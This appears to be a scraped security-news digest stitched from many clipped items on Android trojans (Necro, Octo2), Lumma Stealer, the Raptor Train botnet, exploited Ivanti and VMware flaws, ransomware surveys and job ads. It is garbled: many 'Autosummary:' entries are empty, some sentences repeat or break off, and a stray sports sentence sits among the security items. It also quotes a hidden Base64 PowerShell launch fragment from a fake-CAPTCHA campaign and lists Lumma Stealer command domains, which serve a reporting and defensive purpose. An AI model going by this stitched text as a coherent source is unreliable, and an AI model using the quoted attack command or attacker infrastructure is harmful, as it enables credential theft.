It can perform various malicious actions, including displaying ads in invisible windows, downloading and executing DEX files, installing applications, opening links in hidden WebView windows, executing JavaScript, and creating tunnels through the victim’s device.New variant of Necro Trojan infected more than 11 million devices Pierluigi Paganini September 25, 2024 September 25, 2024 Experts warn of Necro Trojan found in Google Play, threat actors are spreading it through fake versions of legitimate Android apps. "In this Help Net Security interview, Jon France, CISO at ISC2, discusses cybersecurity workforce growth. He outlines organizations’ challenges, such as budget constraints and limited entry-level opportunities. France also points to the urgent need to upskill current employees and adopt inclusive hiring practices to tackle the growing skills gap in the industry. The ISC2 report indicates that the growth of the cybersecurity workforce could be more stable. What are the main reasons behind this slowdown, … More
The post Future-proofing cybersecurity: Why talent development is key appeared first on Help Net Security.
"Autosummary:
The most critical gaps identified include skills in AI (34%), cloud security (30%), zero trust (27%), digital forensics (25%), and application security (24%). In Europe, three major causes of skills shortages have been identified: difficulty finding candidates with the right skills (33%), limited budgets (29%), and IT departments introducing new technology without the expertise to secure it (29%).Companies that succeed in recruiting and retaining diverse talent invest in diversity, equity, and inclusion (DEI) initiatives, set measurable diversity goals, and expand recruitment efforts beyond traditional job portals. Organizations must also focus on expanding entry-level opportunities, upskilling current employees, and building more diverse pipelines of talent to bridge the widening skills gap. "Over the past decade, ransomware has been cemented as one of the top cybersecurity threats. In 2023 alone, the FBI received 2,385 ransomware complaints, resulting in over $34 million in losses. To help businesses combat ransomware and other threats, various regulatory bodies have developed cyber compliance frameworks to standardize best security practices across industries. While following governmental and industry-focused guidelines doesn’t necessarily ensure a stronger cyber posture, these frameworks do provide useful starting points as … More
The post How cyber compliance helps minimize the risk of ransomware infections appeared first on Help Net Security.
"Autosummary:
The platform comes with features designed to simplify the entire compliance lifecycle, with tools to support selecting frameworks, creating custom frameworks based on risk analyses, collecting evidence from integrated platforms, identifying gaps, executing user access reviews, implementing new controls, generating reports and continuously monitoring compliance efforts. Cyber governance, risk, and compliance (GRC) platform Cypago provides a centralized approach to managing compliance by automating many of the repetitive and time-consuming tasks involved in tracking, reporting, and maintaining adherence to various standards. By following the standards and practices outlined in these frameworks, organizations can establish structured and industry-standard cybersecurity programs that are capable of minimizing vulnerabilities, adapting to evolving ransomware trends, and responding to security incidents. "Ransomware is seen as the biggest cybersecurity threat across every industry, with 75% of organizations affected by ransomware more than once in the past 12 months – a jump from 61% in 2023, according to SpyCloud. Session hijacking surges as major ransomware threat Traditional tools and solutions like antivirus and MFA are not infallible. For organizations affected by ransomware in the past year, MFA bypass via session hijacking is seen as the greatest emerging threat … More
The post MFA bypass becomes a critical security issue as ransomware tactics advance appeared first on Help Net Security.
"Autosummary:
Insurance: 6.3x more likely to experience a ransomware attack Healthcare: 2.1x more likely to experience a ransomware attack CIOs, CISOs, and other IT security executives (91%) are almost twice as confident than their security practitioner counterparts (54%) in their organization’s ability to prevent a full-blown ransomware attack – outlining an alarming disconnect between key decision makers and front-line teams on their preparedness for this costly threat. Rise of infostealer malware and digital identity exposure Cybercriminals have pivoted to next-generation tactics, using information-stealing malware (or “infostealers”) to siphon digital identity data, authentication details, and session cookies from infected users and selling this information to ransomware operators – leaving virtually every respondent (99.8%) concerned about this trend. "Autosummary:
"Upon detection, we immediately launched an investigation and took protective steps to address it, including proactively taking systems offline, which impacted network connectivity. "Autosummary:
Among other things, Octo v1 supported keylogging, on-device navigation, SMS and push notification interception, device screen locking, sound muting, arbitrary app launches, and using infected devices for SMS distribution. "Autosummary:
"NICE Actimize launched AI-powered Fraud Investigations solution that facilitates end-to-end fraud management capabilities from detection to investigations. Explicitly designed to enable fraud investigations post detection, the new solution helps financial institutions save both time and money with its automated workflow and robust fraud-specific case management capabilities. Advanced Generative AI embedded in the solution also provides automation that help financial institutions quickly address customer concerns and consistently meet regulatory timelines. The NICE Actimize Fraud Investigation solution … More
The post NICE Actimize Fraud Investigation combats fraud and financial crime appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
In this informative session, you will: Go Beyond the Headlines : Explore the details behind recent ransomware incidents and uncover how attackers infiltrate, encrypt, and extort their victims. "Autosummary:
The new version has been codenamed Octo2 by the malware author, Dutch security firm ThreatFabric said in a report shared with The Hacker News, adding campaigns distributing the malware have been spotted in European countries like Italy, Poland, Moldova, and Hungary. "Autosummary:
Pierluigi Paganini September 24, 2024 September 24, 2024 Israel has been sending text messages, recordings, and hacking radio networks to warn Lebanese citizens to evacuate certain areas. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
AES encryption implementation in JavaScript Source: HP After brute-forcing the password, the researchers analyzed the code and found "that the attacker had neatly commented the entire code," something that rarely happens with human-developed code, because threat actors want to hide how the malware works. "Autosummary:
Image The alleged victims include the City of Pleasanton in California (where the attacker claims to have stolen 283GB of sensitive information), Malaysian pharmaceutical firm Duopharma Biotech (25.7GB), Indian paper manufacturer Satia (7.1GB), and Bangladeshi drugs maker Globe Pharmaceuticals (200MB). "Financially motivated threat actors are targeting North American companies in the transportation and logistics sector with tailored lures, info-stealing malware, and a clever new trick. How the attack unfolds According to Proofpoint threat researchers, the attackers start by compromising email accounts of workers in transportation and shipping companies and then responding to existing email conversations within the account’s inbox. The emails are usually short, and initially urged recipients to follow a link to / download … More
The post Transportation, logistics companies targeted with lures impersonating fleet management software appeared first on Help Net Security.
"Autosummary:
In these limited campaigns, the delivered malware included info-stealers (Lumma Stealer, StealC, ArechClient2, DanaBot) and remote control software (NetSupport). "Autosummary:
Necro"s malicious functions are realized through a set of additional modules (aka plugins) that are downloaded from the command-and-control (C2) server, allowing it to perform a wide range of actions on the infected Android device - NProxy - Create a tunnel through the victim"s device island - Generate a pseudo-random number that"s used as a time interval (in milliseconds) between displays of intrusive ads web - Periodically contact a C2 server and execute arbitrary code with elevated permissions when loading specific links Cube SDK - A helper module that loads other plugins to handle ads in the background Tap - Download arbitrary JavaScript code and a WebView interface from the C2 server that are responsible for covertly loading and viewing ads Happy SDK/Jar SDK - A module that combines NProxy and web modules with some minor differences The discovery of Happy SDK has raised the possibility that the threat actors behind the campaign are experimenting with a non-modular version as well. "Autosummary:
A cyberattack on MoneyGram caused its service outage Pierluigi Paganini September 24, 2024 September 24, 2024 American peer-to-peer payments and money transfer company MoneyGram confirmed that a cyberattack caused its service outage. "Autosummary:
The data that has been exposed includes: Full name Address Date of birth Payroll information, including salaries and bonuses Social insurance number Bank account number used for direct deposits Scans of government-issued identification documents Any personal documents stored on a work computer or drives tied to a work computer Those impacted will receive a three-year free-of-charge identity theft protection and credit monitoring coverage through Equifax, with the enrollment deadline set to January 31, 2025. "Autosummary:
U.S. Water and Wastewater Systems (WWS) Sector facilities have also been breached multiple times over the last decade in Ghost, ZuCaNo, and Makop ransomware attacks that impacted a South Houston wastewater treatment plan in 2011, a water company with outdated software and hardware equipment in 2016, the Southern California Camrosa Water District in August 2020, and a Pennsylvania water system in May 2021. "Autosummary:
A generative artificial intelligence malware used in phishing attacks Pierluigi Paganini September 24, 2024 September 24, 2024 HP researchers detected a dropper that was generated by generative artificial intelligence services and used to deliver AsyncRAT malware. "Autosummary:
"Autosummary:
Some of the tools used by the group are Cobalt Strike, mimikatz, chisel, BloodHound, PowerView, adPEAS, CrackMapExec, Advanced IP Scanner and PsExec. "Autosummary:
"Autosummary:
" The list of malicious packages, now removed from the PyPI repository, is below - The infection chain is fairly simple in that the packages, once downloaded and installed on developer systems, are engineered to execute an encoded next-stage that, in turn, runs the Linux and macOS versions of the RAT malware after retrieving them from a remote server. "Autosummary:
Earth Baxia primarily targeted government agencies, telecommunication businesses, and the energy industry in the Philippines, South Korea, Vietnam, Taiwan, and Thailand.The malicious code supports methods like getFile , getUpdates , sendDocument , and sendMessage to gather information, transfer files, and execute payloads. "More often than not, a cyber attack or a cyber incident that results in business disruption will spur organizations to make changes to improve their cybersecurity and cyber resilience – and sometimes that means changing cybersecurity providers. The recent massive worldwide outage caused by a faulty Crowdstrike sensor content update has had a similar effect on many German organizations, a recent report by the German Federal Office for Information Security (BSI) and Germany’s digital association … More
The post Organizations are changing cybersecurity providers in wake of Crowdstrike outage appeared first on Help Net Security.
"Autosummary:
Increasing network segmentation (49%) Building redundancies in IT (48%) Implementation of zero-trust architecture (39%) Increased use of cloud services (35%) Implementation of offline fallback solutions (31%) Review/adjustment of service level agreements (31%), etc. Interestingly enough, even though two-thirds (64%) of the polled organizations think that an incident like the CrowdStrike outage cannot be completely prevented, 30% have or are planning to diversify IT security solutions they use. "Autosummary:
Targets of the campaigns include entities in South Korea and the U.S. 📰 Around the Cyber World Sandvine Leaves 56 "Non-democratic" Countries: Sandvine, the company behind middleboxes that have facilitated the delivery of commercial spyware as part of highly-targeted attacks, said it has exited 32 countries and is in process of ceasing operations in another 24 countries, citing elevated threats to digital rights." 🔥 Cybersecurity Resources & Insights — Upcoming Webinars Zero Trust: Anti-Ransomware Armor : Join our next webinar with Zscaler"s Emily Laufer for a deep dive into the 2024 Ransomware Report, uncovering the latest trends, emerging threats, and the zero-trust strategies that can safeguard your organization.The botnet consisted of over 260,000 devices in June 2024, with victims scattered across North America, Europe, Asia, Africa, and Oceania, and South America."The misuse of deep packet inspection technology is an international problem that threatens free and fair elections, basic human rights, and other digital freedoms we believe are inalienable," it said."The misuse of deep packet inspection technology is an international problem that threatens free and fair elections, basic human rights, and other digital freedoms we believe are inalienable," it said. Sandvine, the company behind middleboxes that have facilitated the delivery of commercial spyware as part of highly-targeted attacks, said it has exited 32 countries and is in process of ceasing operations in another 24 countries, citing elevated threats to digital rights. "Autosummary:
"Autosummary:
Necro installs several payloads to infected devices and activates various malicious plugins, including: Adware that loads links through invisible WebView windows (Island plugin, Cube SDK) Modules that download and execute arbitrary JavaScript and DEX files (Happy SDK, Jar SDK) Tools specifically designed to facilitate subscription fraud (Web plugin, Happy SDK, Tap plugin) Mechanisms that use infected devices as proxies to route malicious traffic (NProxy plugin) Necro Trojan on Google Play Kaspersky discovered the presence of Necro loader on two apps on Google Play, both of which have a substantial userbase. "Autosummary:
But very soon into the technology’s debut, it began being used to create pornographic images of actresses, celebrities, and, more recently, everyday high schoolers and college students. "Autosummary:
"Autosummary:
By automating patches, detecting vulnerabilities, and managing configurations, it ensures that your endpoints – the most vulnerable entry points for attackers – are fortified, compliant, and resilient.Learn firsthand from industry experts about real-world breaches, the financial havoc they wreaked, and, most importantly, how they could have been avoided. Enter ManageEngine: Your Cybersecurity and Compliance Savior In the midst of this chaos, ManageEngine has proven itself as a trusted partner for organizations grappling with the twin challenges of compliance and cybersecurity. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Critical VMware vCenter Server bugs fixed (CVE-2024-38812) Broadcom has released fixes for two vulnerabilities affecting VMware vCenter Server that can be triggered by sending a specially crafted network packet, and could lead to remote code execution (CVE-2024-38812) or privilege escalation (CVE-2024-38813). Apple releases iOS 18, with security and privacy improvements Apple has launched iOS 18, the latest significant iteration of … More
The post Week in review: Critical VMware vCenter Server bugs fixed, Apple releases iOS 18 appeared first on Help Net Security.
"Autosummary:
New infosec products of the week: September 20, 2024 Here’s a look at the most interesting products from the past week, featuring releases from anecdotes, F5 Networks, Gcore, Rapid7, Strivacity, and Veritas Technologies. Striking the balance between cybersecurity and operational efficiency In this Help, Net Security interview, Michael Oberlaender, ex-CISO, and book author, discusses how to strike the right balance between security and operational efficiency. "Autosummary:
"Autosummary:
Ukraine bans Telegram for government agencies, military, and critical infrastructure Pierluigi Paganini September 21, 2024 September 21, 2024 Ukraine’s NCCC banned the Telegram app for government agencies, military, and critical infrastructure, due to national security concerns. "Autosummary:
Europol dismantled phishing scheme targeting mobile users Pierluigi Paganini September 21, 2024 September 21, 2024 A joint international law enforcement operation led by Europol dismantled a major phishing scheme targeting mobile users. "Autosummary:
The threat actors use a variety of distribution channels, including malvertising, spearphishing, and brand impersonation in online gaming, cryptocurrency, and software, to spread 50 malware payloads, including AMOS, Stealc, and Rhadamanthys. "Autosummary:
" Prominent among the other tools used by Twelve are Cobalt Strike, Mimikatz, Chisel, BloodHound, PowerView, adPEAS, CrackMapExec, Advanced IP Scanner, and PsExec for credential theft, discovery, network mapping, and privilege escalation. "Autosummary:
"Autosummary:
They are aiming to secure a first title win in the competition since 2019 and host second-placed Argentina, who have 14 points, in the final game for both teams next Saturday, 28 September. "In this Help, Net Security interview, Michael Oberlaender, ex-CISO, and book author, discusses how to strike the right balance between security and operational efficiency. Oberlaender advises companies starting their cybersecurity journey and stresses the importance of aligning with various frameworks. He also introduces his latest book, which provides insights into the CISO role and effective cybersecurity leadership. How do you balance the need for security with operational efficiency and flexibility in an organization’s cybersecurity strategy? … More
The post Striking the balance between cybersecurity and operational efficiency appeared first on Help Net Security.
"Autosummary:
Establish your security operations center (SOC), perform consistent, immutable backups (on non-online systems), rollout some antimalware features, get your identity and access management (IAM) in order, build your fortress with firewalls, DMZs, zero trust networks, cloud security zones, develop your encryption vision, key management systems, activate the encryption and perform key rotation.ISO27XXX, NIST-800-XXX, NIST CSF, CIS, COBIT, COSO, ITIL, PCI, OWASP, plus a plethora of others, plus all the regulations. On the opposite side, the far right lane (truck lane, again, if not in left-hand traffic) is where security is overburdened, many controls, not all of them making sense, poor implementation, and slowing down all following traffic). "Autosummary:
"Autosummary:
"Autosummary:
On September 13, 2024, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Ivanti another Cloud Services Appliance OS Command Injection Vulnerability, tracked as CVE-2024-8190 (CVSS score of 7.2), to its Known Exploited Vulnerabilities (KEV) catalog. "Autosummary:
"Autosummary:
The phishing-as-a-service (PhaaS) platform, called iServer, is estimated to have claimed more than 483,000 victims globally, led by Chile (77,000), Colombia (70,000), Ecuador (42,000), Peru (41,500), Spain (30,000), and Argentina (29,000). iServer, per the Singapore-based company, offered a web interface that enabled low-skilled criminals, known as "unlockers," to siphon device passwords, user credentials from cloud-based mobile platforms, essentially permitting them to bypass Lost Mode and unlock the devices. "Autosummary:
"In this Help Net Security interview, Alex Spivakovsky, VP of Research & Cybersecurity at Pentera, discusses essential metrics for evaluating the success of security programs. Spivakovsky explains how automation and proactive testing can reveal vulnerabilities and improve overall security posture. What are the most effective metrics for measuring the success of a security program? The most straightforward metric is: Has your organization been breached? If the answer is yes, it’s clear there’s work to be … More
The post Essential metrics for effective security program assessment appeared first on Help Net Security.
"Autosummary:
The formula typically used is: ROSI = (Losses avoided – Cost of security measures) / Cost of security measures For example, if a security program prevents $1 million in potential breach losses and costs $250,000 to implement, the ROSI would be 3, meaning a return of $3 for every $1 spent on security.Internal security teams tend to be small, relative to the overall organization, and cannot be everywhere; all employees need to understand how their actions can impact overall the organizational security posture and practice proper security hygiene.In this Help Net Security interview, Alex Spivakovsky, VP of Research & Cybersecurity at Pentera, discusses essential metrics for evaluating the success of security programs.This helps executive management and board members, who are typically more business-focused, and less familiar with cybersecurity concepts, to better understand the impact of security initiatives. "Autosummary:
When executed, the malware attempts to contact several suspicious domains, most of which are down at the time of writing: eemmbryequo.shop keennylrwmqlw.shop licenseodqwmqn.shop reggwardssdqw.shop relaxatinownio.shop tendencctywop.shop tesecuuweqo.shop tryyudjasudqo.shop BleepingComputer has confirmed that the malware is the Lumma Stealer information-stealing malware, used to steal credentials, authentication cookies, and browsing history from installed web browsers. "Forescout announced its new SaaS Operational Technologies (OT) solution. Forescout for OT Security is a security solution that allows organizations to secure complex, heterogeneous OT, IoT/IoMT, and IT environments whether they are fully in cloud, completely air-gapped, or hybrid. Forescout for OT Security combines: Proactive security and exposure management Threat detection powered by Forescout Research – Vedere Labs’ proprietary threat research of unmanaged devices Critical operational monitoring Control across cloud and on-premises networks “The attack … More
The post Forescout for OT Security secures OT, IoT, and IT hybrid environments appeared first on Help Net Security.
"Autosummary:
"Strivacity released Strivacity AI Assist, a new “smart assistant” powered by GenAI that makes it easier to manage and secure digital identities across business-to-business (B2B) and business-to-consumer (B2C) use cases. Building on Strivacity’s machine learning capabilities for fraud detection, Strivacity AI Assist is the first GenAI capability embedded across a CIAM platform that provides real-time, contextual guidance throughout the customer journey – spanning customer experience, security, and compliance. With AI Assist, digital experience leaders, security … More
The post Strivacity AI Assist optimizes digital identity management appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Criminals target systems with vulnerabilities in basic areas, such as unpatched software, unsafe network services, and unencrypted web communications. These weaknesses provide easy entry points for attackers, allowing them to compromise critical systems and, ultimately, hold organizations hostage with ransomware.Cybercriminals target suppliers, partners, and other third-party entities that may have weaker cybersecurity defenses. Healthcare organizations must scrutinize their suppliers" cybersecurity hygiene, ensuring they meet high standards of protection and continuously monitoring them for potential vulnerabilities. By assigning A to F cybersecurity hygiene ratings across multiple domains, including software patching, network filtering, and web encryption, RiskRecon helps organizations identify their vulnerabilities and prioritize areas for improvement.Healthcare accounted for 17.8% of all breach events and 18.2% of destructive ransomware events since 20121, surpassing other sectors like finance, government, and education. "Autosummary:
"Autosummary:
Antivirus firm Dr.Web disconnected all servers following a cyberattack Pierluigi Paganini September 19, 2024 September 19, 2024 Russian anti-virus firm Doctor Web (Dr.Web) disconnected all servers following a cyberattack over the weekend. "Autosummary:
"For a while now, security researchers have been warning about fake human verification pages tricking Windows users into inadvertently installing malware. A recently exposed campaign showed how some users end up on these pages. Beware of fake human verification pages In late August 2024, Palo Alto Networks’ Unit 42 spotted seven CAPTCHA-style human verification pages that were not what they seemed. “These pages have a button that, when clicked, shows instructions for victims to paste … More
The post Windows users targeted with fake human verification pages delivering malware appeared first on Help Net Security.
"Autosummary:
“Once the user pastes the PowerShell command into the Run dialog box, it will run PowerShell in a hidden window and execute the Base64-encoded command: powershell -w hidden -eC.” Once decoded, the command fetches the content from a text file hosted on the remote server, which contains additional commands to download the Lumma Stealer and executes them. "Autosummary:
"Autosummary:
A fully-featured remote access trojan developed in Java, SambaSpy is nothing short of a Swiss Army knife that can handle file system management, process management, remote desktop management, file upload/download, webcam control, keylogging and clipboard tracking, screenshot capture, and remote shell. "Autosummary:
"Autosummary:
Remote Code Execution Vulnerability CVE-2019-1069 Microsoft Windows Task Scheduler Privilege Escalation Vulnerability CVE-2022-21445 Oracle JDeveloper Remote Code Execution Vulnerability CVE-2020-14644 Oracle WebLogic Server Remote Code Execution Vulnerability CVE-2022-21445 vulnerability (CVSS score of 9.8) is a remote code execution issue in the Oracle JDeveloper product of Oracle Fusion Middleware (component: ADF Faces). "Autosummary:
Federal Civilian Executive Branch (FCEB) agencies must now patch vulnerable appliances within three weeks by October 4 and October 10, respectively, as required by Binding Operational Directive (BOD) 22-01. "CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.
Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.
Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria "
Autosummary:
"Autosummary:
Silverfort"s service account protection: Automated discovery, profiling, and protection Silverfort enables identity and security teams to keep their service accounts secure in the following manner: Automated discovery Silverfort sees and analyzes every AD authentication. In this article, we explore what makes service accounts such a lucrative target, why they are beyond the scope of most security control, and how the new approach of unified identity security can prevent service accounts from compromise and abuse.Silverfort"s identity security platform is built on a proprietary technology that enables it to have continuous visibility, risk analysis, and active enforcement on any AD authentication, including, of course, the ones made by service accounts. "Autosummary:
Ivanti warns of a new actively exploited Cloud Services Appliance (CSA) flaw Pierluigi Paganini September 19, 2024 September 19, 2024 Ivanti warned of a new Cloud Services Appliance (CSA) vulnerability that is being exploited in attacks in the wild against a limited number of customers. "Autosummary:
Apache HugeGraph-Server is the core component of the Apache HugeGraph project, an open-source graph database designed for handling large-scale graph data with high performance and scalability, supporting complex operations required in deep relationship exploitation, data clustering, and path searches. "Autosummary:
"Application Security Engineer CHANEL | France | On-site – View job details As an Application Security Engineer, you will perform application-focus, offensive, security assessments of existing and upcoming Chanel’s features and products. Enforce smart CI/CD security tooling (SAST, dependencies checker, IAST, RASP). Identify vulnerability in the source code and design of our products. Fix vulnerabilities or support development team on fixing. Maintain and contribute to Chanel’s Secure Development Lifecycle. Contribute to our Red Team / … More
The post Cybersecurity jobs available right now: September 18, 2024 appeared first on Help Net Security.
"Autosummary:
Senior Red Team Operator Deloitte | Australia | On-site – View job details As a Senior Red Team Operator, you will deliver red team campaigns by performing intelligence gathering on target networks, people, processes, and technologies, finding creative ways to gain a foothold in target networks, delivering malware and establishing command and control (C2), and moving stealthily within target networks to achieve campaign objectives while remaining undetected by blue teams. Senior Engineer – Application Security Trust in SODA | Ireland | Remote – View job details As a Senior Engineer – Application Security, you will design, develop, test, deploy and maintain SAST, SCA and secret scanning tools into the CI/CD pipeline and developer workflow tools. Senior Security Engineer Avrioc Technologies | UAE | On-site – View job details As a Senior Security Engineer, you will design, implement, and manage SIEM, PAM, and DAM solutions to secure access to critical systems and sensitive data. Network and Security Engineer SiPearl | France | Hybrid – View job details As a Network and Security Engineer, you will manage the company’s networks (2 data centers in France, offices in France, Germany, Spain, and remote offices). Malware Reverse Engineer IBM | Philippines | On-site – View job details As a Malware Reverse Engineer, you will completely reverse engineer malicious software, write detailed reports on command functionality, malware communications, and encryption mechanisms, and develop targeted python scripts to support identification and automation efforts. Senior Manual Ethical Hacker Bank of America | United Kingdom | On-site – View job details As a Senior Manual Ethical Hacker, you will assess company’s application security by conducting penetration tests, evaluate both internal and external web, mobile, and web service applications. "Broadcom has released fixes for two vulnerabilities affecting VMware vCenter Server that can be triggered by sending a specially crafted network packet, and could lead to remote code execution (CVE-2024-38812) or privilege escalation (CVE-2024-38813). “Broadcom is not currently aware of exploitation ‘in the wild’,” the company says, but noted that organizations should promptly act to install one of the updated versions. VMware has patched a similarly critical RCE flaw (CVE-2023-34048) in vCenter Server in October … More
The post Critical VMware vCenter Server bugs fixed (CVE-2024-38812) appeared first on Help Net Security.
"Autosummary:
"Rapid7 has unveiled Vector Command, a fully-managed offensive security service. Vector Command combines the external attack surface assessment capabilities of Rapid7’s recently launched Command Platform with continuous Red Teaming services by its internal experts to help customers identify and validate IT security posture weaknesses from an attacker’s perspective. As the attack surface expands through shadow IT, cloud resources, SaaS solutions, and more, security leaders must maintain visibility of their organization’s internet-facing assets and the security … More
The post Rapid7 launches Vector Command for continuous red teaming and security gap identification appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The threat intelligence firm said it has observed UNC2970 singling out various entities located in the U.S., the U.K., the Netherlands, Cyprus, Sweden, Germany, Singapore, Hong Kong, and Australia. "Autosummary:
"Ultimately as part of this operation we were able to identify thousands of infected devices, and then with court authorization, issued commands to remove malware from them, prying them from China"s grip" - Christopher Wray In a MySQL database retrieved from an upstream management server (Tier 3), the FBI found that in June this year, there were more than 1.2 million records of compromised devices (active and previously compromised), with 385,000 unique systems in the U.S. Over four years, Raptor Train has grown into a complex, multi-tiered network with an enterprise-grade control system for handling tens of servers and a large number of infected SOHO and consumer devices: routers and modems, NVRs and DVRs, IP cameras, and network-attached storage (NAS) servers. The botnet has been used to target entities in the military, government, higher education, telecommunications, defense industrial base (DIB), and IT sectors, mainly in the US and Taiwan. "Autosummary:
"The attempt to harm our infrastructure was prevented in a timely manner, and no user whose system was protected by Dr.Web was affected," it added in a separate statement in English, published on its official website. "Autosummary:
The call centre uses several different people, all who play a different role to process victims: the Walmart customer service representative the higher authority or “supervisor” a fake bank employee a fake FTC investigator When we called, the scammers claimed that our account had been used to transfer huge amounts of money to narco trafficking countries: Now, all the banking found which was created using your personal information are transferring huge amounts of money to the narco trafficking countries such as Columbia, Mexico, some Saudi Arabia countries and Columbia.Oddly enough, the scammer mentions there won’t be any taxes on the transaction, which really would be the last concern on someone’s about to be arrested: Yes, I know Sir, it’s not a checking account, it’s a Bitcoin wallet. Figure 1: A Google search for Walmart’s phone number on a mobile device Figure 2: A Google search for Walmart’s phone number on a desktop computer Walmart Lists In previous cases, we have seen malicious advertisers impersonate brands by displaying their official website in the ad URL. "Autosummary:
Some of the devices targeted include routers, IP cameras, DVRs, and NAS from various manufacturers such as ActionTec, ASUS, DrayTek, Fujitsu, Hikvision, Mikrotik, Mobotix, Panasonic, QNAP, Ruckus Wireless, Shenzhen TVT, Synology, Tenda, TOTOLINK, TP-LINK, and Zyxel. "Autosummary:
"Autosummary:
Below are some of the devices included in the botnet: Modems/Routers ActionTec PK5000 ASUS RT-*/GT-*/ZenWifi TP-LINK DrayTek Vigor Tenda Wireless Ruijie Zyxel USG* Ruckus Wireless VNPT iGate Mikrotik TOTOLINK IP Cameras D-LINK DCS-* Hikvision Mobotix NUUO AXIS Panasonic NVR/DVR Shenzhen TVT NVRs/DVRs NAS QNAP (TS Series) Fujitsu Synology The attribution of the Raptor Train botnet to the Chinese nation-state actor is based on multiple factors, including the operational timelines, targeting of sectors aligned with Chinese interests, use of the Chinese language, and other tactics, techniques, and procedures (TTPs) that overlap with known Chinese cyber activities. "Autosummary:
"Unlike the previous system, which used specific, blockable IPs, the new system uses dynamic IPs that change constantly," the news release states. "The global cybersecurity workforce gap reached a new high with an estimated 4.8 million professionals needed to effectively secure organizations, a 19% year-on-year increase, according to ISC2. Despite the growing need for professionals, global workforce growth has slowed for the first time since ISC2 began estimating the workforce size six years ago, holding at an estimated 5.5 million people (a 0.1% year-on-year increase). This contrasts with last year, when the workforce grew 8.7% year-on-year despite … More
The post The cybersecurity workforce of the future requires diverse hiring practices appeared first on Help Net Security.
"Autosummary:
While 74% of professionals agree that the 2024 threat landscape is the most challenging it has been in the last five years, budget pressures on the cybersecurity workforce include: 37% experiencing budget cuts (+7% from 2023) 25% experiencing layoffs in their cybersecurity team (+3% from 2023) 38% experiencing hiring freezes (+6% from 2023) 32% seeing fewer promotions (+6% from 2023) Skills gaps put organizations at risk This year, a record 15,852 cybersecurity practitioners and decision-makers participated in the study. "Autosummary:
Russian state media networks banned by Facebook owner The Russian embassy in Washington, broadcaster RT, formerly Russia Today, and the owner of the Sputnik news agency, Rossiya Segodnya, did not immediately respond to BBC requests for comment. "Autosummary:
"Autosummary:
"Autosummary:
“People with symptoms of sensitive medical conditions, including cancer and sexually transmitted infections, are among almost a million individuals who had their personal information published online following a ransomware attack that disrupted NHS hospitals in London earlier this year, according to an analysis shared with Recorded Future News.” reported Recorded Future News. "CVE-2024-8190, an OS command injection vulnerability in Ivanti Cloud Services Appliance (CSA) v4.6, is under active exploitation. Details about the attacks are still unknown, but there may be more in the near future: Horizon3.ai researchers have published their analysis of the flaw and a PoC exploit for it. About CVE-2024-8190 CVE-2024-8190 is a command injection vulnerability that can only be exploited if the attacker manages to log into the appliance’s admin login page first. According … More
The post PoC exploit for exploited Ivanti Cloud Services Appliance flaw released (CVE-2024-8190) appeared first on Help Net Security.
"Autosummary:
And while users are required to change the default login credentials (username: admin, password: admin) when logging in for the first time, a new password might not be strong enough to counter the disadvantage presented by non-existent rate limiting for login attempts. "Autosummary:
MSHTML Platform Spoofing Vulnerability CVE-2024-6670 Progress WhatsUp Gold SQL Injection Vulnerability CVE-2024-43461 – Microsoft this week warned that attackers actively exploited the Windows vulnerability CVE-2024-43461 as a zero-day before July 2024. According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog. "Autosummary:
Succesful data transfer log Source: modePUSH Defense measures include monitoring for AzCopy execution, outbound network traffic to Azure Blob Storage endpoints at ".blob.core.windows.net" or Azure IP ranges, and setting alarms for unusual patterns in file copying or access on critical servers. "Autosummary:
Chinese man charged for spear-phishing against NASA and US Government Pierluigi Paganini September 17, 2024 September 17, 2024 US DoJ charged a Chinese national who used spear-phishing emails to obtain sensitive info from NASA, the U.S. Air Force, Navy, Army, and the FAA. "Autosummary:
"Autosummary:
The consent decree mandates AT&T to implement a comprehensive Information Security Program that includes broad customer data protection, improve its data inventory processes to track data shared with vendors, ensure that vendors follow retention and disposal rules for customer information (to limit the amount of customer data vulnerable to date breaches), and conduct annual compliance audits to assess AT&T"s compliance with these requirements. "Autosummary:
Dubbed Greasy Opal by Arkose Labs, the Czech Republic-based "cyber attack enablement business" is believed to have been operational since 2009, offering to customers a toolkit of sorts for credential stuffing, mass fake account creation, browser automation, and social media spam at a price point of $190 and an additional $10 for a monthly subscription. Over 36% of the attacks have singled out the business-and-economy sector, followed by financial services (12.9%), government (6.9%), health and medicine (5.7%), and computer and internet (5.4%). "Autosummary:
Genetic testing company 23andMe will pay $30 million to settle a class action lawsuit over a 2023 data breach which ended in some customers having information like names, birth years, and ancestry information exposed. "CVE-2024-43461, a spoofing vulnerability affecting Windows MSHTML – a software component used by various apps for rendering render web pages on Windows – “was exploited as a part of an attack chain relating to CVE-2024-38112, prior to July 2024,” Microsoft has revealed. The latter vulnerability was patched by the company in July 2024, and threat hunters with Trend Micro’s Zero Day Initiative explained that it had been used by the Void Banshee APT group to … More
The post Microsoft confirms second 0-day exploited by Void Banshee APT (CVE-2024-43461) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
These attacks manifest in the form of "highly tailored, difficult-to-detect social engineering campaigns" aimed at employees of decentralized finance ("DeFi"), cryptocurrency, and similar businesses, as recently highlighted by the U.S. Federal Bureau of Investigation (FBI) in an advisory. "Autosummary:
